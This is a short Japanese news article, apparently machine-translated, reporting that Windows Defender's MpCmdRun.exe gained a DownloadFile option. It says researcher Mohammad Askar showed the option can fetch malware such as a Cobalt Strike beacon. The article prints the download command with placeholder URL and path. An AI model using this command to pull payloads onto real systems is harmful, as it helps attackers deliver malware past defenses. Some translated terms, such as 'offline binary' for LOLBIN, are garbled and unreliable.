- ウィンドウズ のディフェンダー ウィンドウズ 10はシステムを防御するための優れたツールですが、新しいアップデートによって脅威になりました。
- 新しいDownloadFile コマンドを使用して、コンピューター上のマルウェアを含む任意の外部ファイルをダウンロードできます.
- 私たちを探索する ソフトウェアセクション 最新のデジタルツールに関する最高の記事をご覧ください。
- 最新のWindows10の記事に興味がある場合は、包括的な記事にアクセスしてください。 Windows10ハブ.
Windows10のWindowsDefenderは、マルウェア攻撃の場合の最初の防衛線であり、 かなり良い仕事も.
ただし、新しいアップデートの1つで、強力なアンチウイルスに新しいDownloadFileコマンドが追加されました。これにより、誰でもURLからコンピューター上の特定のパスに任意のファイルをダウンロードできるようになります。
これは、マルウェアのダウンロードにも使用できるため、エクスプロイトと呼ぶことができます。これは、セキュリティ研究者のMohammadAskarによって発見されたものです。 投稿 Twitterでの彼の発見。
Windows Defenderを使用してマルウェアをダウンロードするにはどうすればよいですか?
Microsoft Antimalware Serviceコマンドラインユーティリティ(MpCmdRun.exe)を使用して、外部ソースからコンピュータにファイルをダウンロードするのは非常に簡単です。
MpCmdRun.exe -DownloadFile -url [url] -path [path_to_save_file]
彼の試みでは、アスカー このコマンドラインを使用して、有名な攻撃者ツールであるCobaltStrikeビーコンをダウンロードできました。
新しいコマンドはバージョンに含まれています 4.18.2007.8-0以降は、攻撃者にとってかなり良い開始時間を提供します。
基本的に、この機能は変わります Windows Defender 悪意のある目的で使用される可能性のある無害なシステムファイルであるLOLBIN(オフラインバイナリ)に変換されます。
幸い、有害なファイルをダウンロードすると、同じWindowsDefenderまたは別のWindowsDefenderによって検出されます。 ウイルス対策ソフト 存在する場合。
信頼性の高い保護ソフトウェアから、Windows Defenderは、管理者やセキュリティの専門家による綿密な監視が必要となる可能性のある別の脅威になりました。
提案やコメントがある場合は、コメントセクションに残してください。
